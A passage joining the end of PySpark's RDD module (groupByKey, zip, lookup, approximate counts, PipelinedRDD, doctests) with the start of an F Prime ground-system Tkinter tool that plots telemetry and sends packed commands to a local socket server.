partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
cmd_telm_monitor.py
|
#!/usr/bin/env python
import matplotlib
matplotlib.use('TkAgg')
from numpy import arange, sin, pi
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.figure import Figure
from Tkinter import *
import sys
import threading
import Queue
import os
import math
import Pmw
import struct
import math
import time
from fprime_gds.gse.controllers import client_sock
#import ModeMgrSm
class Plotter:
"""
Class to accept telemetry from multi-partiiions and sends commands.
It also launches thread to generate fake simulation data.
"""
def __init__(self, master, width=500, height=350):
"""
Constructor
"""
self.root = master
# Title
self.status = Label(master, text="Multi-Partition Telemetry & Commander", justify=LEFT)
self.status.pack(side=TOP)
# Entry fields to support commands
self.control3 = Frame(master)
self.control3.pack(side=BOTTOM, fill=X, padx=2)
# Buttons to launch demos
self.control2 = Frame(master)
self.control2.pack(side=BOTTOM, fill=X, padx=2)
# Buttons to launch demos
self.control = Frame(master)
self.control.pack(side=BOTTOM, fill=X, padx=2)
# Build temp plot here for testing
self.fig = Figure(figsize=(6,3), dpi=100)
self.axis = self.fig.add_subplot(111)
t = arange(0.0,3.0,0.01)
s = sin(2*pi*t)
t=[]
s=[]
# Initialize plots
self.axis.plot(t,s)
# Label title, axis and turn on grid
self.label_plot()
# a tk.DrawingArea
canvas = FigureCanvasTkAgg(self.fig, master=master)
canvas.show()
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)
#
toolbar = NavigationToolbar2TkAgg( canvas, master )
toolbar.update()
canvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1)
#
self.display = Pmw.ScrolledText(self.root, hscrollmode='dynamic',
vscrollmode='dynamic', hull_relief='sunken',
hull_background='gray40', hull_borderwidth=10,
text_background='white', text_width=16,
text_foreground='black', text_height=10,
text_padx=10, text_pady=10, text_relief='groove',
text_font=('arial', 12, 'bold'))
self.display.pack(side=TOP, expand=YES, fill=BOTH)
self.display.tag_config('ans', foreground='red')
self.display.tag_config('blue', foreground='blue')
self.display.tag_config('red', foreground='red')
self.display.tag_config('green', foreground='green')
self.display.tag_config('black', foreground='black')
# Quit
self.quit_bt = Button(self.control, text='Quit', activebackground="pink", command=self.quit)
self.quit_bt.pack(side=LEFT, fill=X, expand=True)
# Connect
self.connect_bt = Button(self.control, text='Connect', activebackground="pink", command=self.connect)
self.connect_bt.pack(side=LEFT, fill=X, expand=True)
# Clear
self.clear_bt = Button(self.control, text='Clear', activebackground="pink", command=self.clear)
self.clear_bt.pack(side=LEFT, fill=X, expand=True)
# Play
self.play_bt = Button(self.control, text='List', activebackground="pink", command=self.list)
self.play_bt.pack(side=LEFT, fill=X, expand=True)
# Pause
self.pause_bt = Button(self.control, text='Play', activebackground="pink", command=self.play)
self.pause_bt.pack(side=LEFT, fill=X, expand=True)
# Stop
self.stop_bt = Button(self.control, text='Stop', activebackground="pink", command=self.stop)
self.stop_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 1
self.op1_bt = Button(self.control2, text='Mode Change', activebackground="pink", command=self.op1)
self.op1_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 2
self.op2_bt = Button(self.control2, text='Set Param', activebackground="pink", command=self.op2)
self.op2_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 3
self.op3_bt = Button(self.control2, text='Get Param', activebackground="pink", command=self.op3)
self.op3_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 4
self.op4_bt = Button(self.control2, text='Test Cent. (x,y)', activebackground="pink", command=self.op4)
self.op4_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 5
self.op5_bt = Button(self.control2, text='Test ARS Data', activebackground="pink", command=self.op5)
self.op5_bt.pack(side=LEFT, fill=X, expand=True)
#
# Entry fields to support command.
#
self.mode_signal = 1
self.signals = ["OnCmd", "OffCmd", "ARS_On", "ARS_Off", "Centroid_On", "Centroid_Off",
"Show_SM_GUI", "Hide_SM_GUI"]
self.mode_entry = Pmw.ComboBox(self.control3,
scrolledlist_items=self.signals,
selectioncommand = self.changeMode)
self.mode_entry.pack(side=LEFT, fill=X, expand=False)
self.mode_entry.selectitem(0, setentry = 1)
self.mode_entry.component("entryfield").configure(validate=self.validateMode)
#
self.set_param = Pmw.EntryField(self.control3, value=1.0,
validate='real')
self.set_param.pack(side=LEFT, fill=X, expand=False)
#
self.get_param = Pmw.EntryField(self.control3, value="Params",
validate='alphanumeric')
self.get_param.pack(side=LEFT, fill=X, expand=False)
#
self.test_cent = Pmw.EntryField(self.control3, value='0 0',
validate=self.cent_coord_validate)
self.test_cent.pack(side=LEFT, fill=X, expand=False)
self.cent_coord_validate_ok = True
#
self.test_ars = Pmw.EntryField(self.control3, value='0.0 0.0 0.0',
validate=self.ars_validate)
self.test_ars.pack(side=LEFT, fill=X, expand=False)
self.ars_validate_ok = True
#
# Socket when connection established
#
self.sock = None
# Store thread here
self.thread = threading.Thread()
self.thread2 = threading.Thread()
# Instance a lock and make all socket read/write atomic
self.lock = threading.Lock()
# Create Queue for telemetry here
self.queue = Queue.Queue()
# Create Queue for simulation data here
self.queue2 = Queue.Queue()
# Define plot format for each instance here
# Note that instance id is index to list
# Note: Adding a "-" results in lines in replot only.
self.plot_fmt = []
self.plot_fmt.append("ro")
self.plot_fmt.append("g^")
self.plot_fmt.append("c<")
self.plot_fmt.append("m>")
#
self.i = 0
#
width = 600
height = 600
x = 500
y = 500
# self.mode_mgr_sm_win = ModeMgrSm.ModeMgrSm("ModeMgrSm", big_name="Mode Manager State Machine", size=16)
# self.mode_mgr_sm_win.win.geometry("%dx%d+%d+%d" % (width, height, x, y))
# self.mode_mgr_sm_win.win.withdraw()
def cent_coord_validate(self, text):
"""
Check that entry is (x y) where x and y are integer.
"""
self.cent_coord_validate_ok = False
if len(text.split(" ")) != 2:
return Pmw.PARTIAL
x,y = text.split(" ")
if not x.isdigit():
return Pmw.PARTIAL
if not y.isdigit():
return Pmw.PARTIAL
self.cent_coord_validate_ok = True
return Pmw.OK
def ars_validate(self, text):
"""
Check that entry is (x y z) where x, y, z are float.
"""
self.ars_validate_ok = False
if len(text.split(" ")) != 3:
return Pmw.PARTIAL
x,y,z = text.split(" ")
xp = x.partition(".")
if not (xp[0].isdigit() and xp[1]=='.' and xp[2].isdigit()):
return Pmw.PARTIAL
yp = y.partition(".")
if not (yp[0].isdigit() and yp[1]=='.' and yp[2].isdigit()):
return Pmw.PARTIAL
zp = z.partition(".")
if not (zp[0].isdigit() and zp[1]=='.' and zp[2].isdigit()):
return Pmw.PARTIAL
self.ars_validate_ok = True
return Pmw.OK
def set_demo_lim(self):
"""
Set axis limits for long trajectory demo.
"""
self.axis.set_xlim(0.0, 50.0)
#self.axis.set_ylim(-1.25, 1.25)
self.axis.set_ylim(-50.0, 50.0)
def set_auto_lim(self):
"""
Set autoscale of axis
"""
self.axis.relim()
self.axis.autoscale_view(True,True,True)
def label_plot(self):
"""
Refresh plot labels and settings
"""
self.axis.grid()
self.axis.set_title("Notional Tip/Tilt Position Update")
self.axis.set_ylabel("Tip/Tilt (radians)")
self.axis.set_xlabel("N (counts)")
# Set default xy axis
self.set_demo_lim()
# Button row 1 functionality here...
def list(self):
self.root.update_idletasks()
if self.sock != None:
self.lock.acquire()
self.sock.send("List\n")
self.lock.release()
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
def play(self):
self.root.update_idletasks()
if self.sock != None:
self.queue2.put("PLAY")
self.display.insert(END, "Sent PLAY request to sim thread...\n", "green")
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
def stop(self):
self.root.update_idletasks()
if self.sock != None:
self.queue2.put("STOP")
self.display.insert(END, "Sent STOP request to sim thread...\n", "green")
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
# Button row 2 functionality here...
def app_cmd(self, msg):
"""
Package command for server to send to APP
"""
if self.sock != None:
cmd = "A5A5 " + "APP " + msg
self.lock.acquire()
self.sock.send(cmd)
self.lock.release()
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
def app_cmd_fmt(self, op,s1,i1,i2,f1,f2):
"""
Packet format for basic command
"""
n = 0
l = 80
fmt = "Message sent: (%d,%s,%d,%d,%d,%f,%f,%d)\n"
msg = struct.pack(">I80s3i",op,s1,l,i1,i2) + struct.pack("2f",f1,f2) + struct.pack(">i",n)
print fmt % (op,s1,l,i1,i2,f1,f2,n)
self.display.insert(END, fmt % (op,s1,l,i1,i2,f1,f2,n), "black")
self.display.see(END)
return msg
def op1(self):
"""
Execute op 1 command
"""
val = int(self.mode_signal)
msg = self.app_cmd_fmt(1, "", val, 0, 0.0, 0.0)
self.app_cmd(msg)
def changeMode(self, text):
"""
Set the mode manager mode, or hide/show mode mgr display
"""
item = self.mode_entry.getvalue()[0]
if item == "Show_SM_GUI":
self.mode_signal = 1
self.mode_mgr_sm_win.win.deiconify()
self.mode_mgr_sm_win.win.lift(self.root)
elif item == "Hide_SM_GUI":
self.mode_signal = 1
self.mode_mgr_sm_win.win.withdraw()
elif item.isdigit():
self.mode_signal = int(item)
else:
self.mode_signal = self.signals.index(item) + 1
# print self.mode_signal
def validateMode(self, text):
"""
Validate mode is in the list or a number of 1 to 6 here.
"""
if text in self.signals:
return Pmw.OK
if text.isdigit():
if 0 < int(text) < 7:
return Pmw.OK
return Pmw.PARTIAL
def op2(self):
val = float(self.set_param.getvalue())
msg = self.app_cmd_fmt(2, "", 0, 0, val, 0.0)
self.app_cmd(msg)
def op3(self):
val = self.get_param.getvalue()
msg = self.app_cmd_fmt(3, val, 0, 0, 0.0, 0.0)
self.app_cmd(msg)
def op4(self):
"""
Send x, y and increment each time...
"""
if self.cent_coord_validate_ok:
val = self.test_cent.getvalue().split(" ")
n = 1
x = int(val[0])
y = int(val[1])
msg = struct.pack(">3i",x,y,n)
#
# Make msg 108 bytes like command
buf = 96*"A5"
msg = struct.pack(">96s",buf) + msg
self.app_cmd(msg)
self.display.insert(END, "opcode=%d, Coord=(%d,%d)\n" % (n,x,y),"black")
self.display.see(END)
def op5(self):
"""
Send x, y, z and increment each fractionally...
"""
if self.ars_validate_ok:
c = self.test_ars.getvalue().split(" ")
n = 2
f1 = float(c[0])
f2 = float(c[1])
f3 = float(c[2])
msg = struct.pack("3f",f1,f2,f3) + struct.pack(">i",n)
#
# Make msg 108 bytes like command
buf = 92*"A5"
msg = struct.pack(">92s",buf) + msg
self.app_cmd(msg)
self.display.insert(END, "opcode=%d, Angles=(%f,%f,%f)\n" % (n,f1,f2,f3),"black")
self.display.see(END)
def quit(self):
"""
Quit the plotter
"""
self.clear()
root.quit()
root.destroy()
def receive_telemetry(self, sock):
"""
Receive telemetry by first reading 4 byte size,
then reading size bytes of serial telemetry
and returning it as a message.
"""
msg = sock.recv(4)
size = int(struct.unpack("i",msg)[0])
data = sock.recv(size)
return data
def enqueue_output(self, sock, queue):
"""
Queue up socket telemetry for TK processing
"""
while 1:
try:
#x = sock.receive()
x = self.receive_telemetry(sock)
queue.put(x)
except RuntimeError:
queue.put("terminate")
print "Socket connection terminated"
break
return
def enqueue_sim_output(self, sock, queue):
"""
Queue up socket sim ARS data for C++ app commanding
"""
angle = 0.0
while 1:
try:
msg = queue.get()
if msg == "PLAY":
while 1:
# Update rate is 2 hz.
time.sleep(0.5)
# Compute x, y, z sin phased by 45 degree each
P = 45.0 * (math.pi/180.0)
# Phase
G = 1.0
# Angle sin values
x = G * math.sin(angle)
y = G * math.sin(angle + P)
z = G * math.sin(angle + 2*P)
# Angle increment value
angle += 10.0 * (math.pi/180.0)
#print time.time(), x, y, z
n = 2
msg = struct.pack("3f",x,y,z) + struct.pack(">i",n)
#
# Make msg 108 bytes like command
buf = 92*"A5"
msg = struct.pack(">92s",buf) + msg
#
self.app_cmd(msg)
if not queue.empty():
msg = queue.get()
print msg
if msg == "STOP":
angle = 0.0
break
elif msg == "STOP":
pass
elif msg == "RESET":
pass
else:
pass
except RuntimeError:
queue.put("terminate")
print "Socket connection terminated"
break
def connect(self):
"""
Connect to TRN filter state telemetry socket
and start listener thread.
"""
if self.thread.isAlive() == True:
print "LISTENER THREAD IS ALIVE!"
return
# connect to server TRN
try:
port = 50007
server = "127.0.0.1"
str = "Connected to server (host addr %s, port %d)" % (server, port)
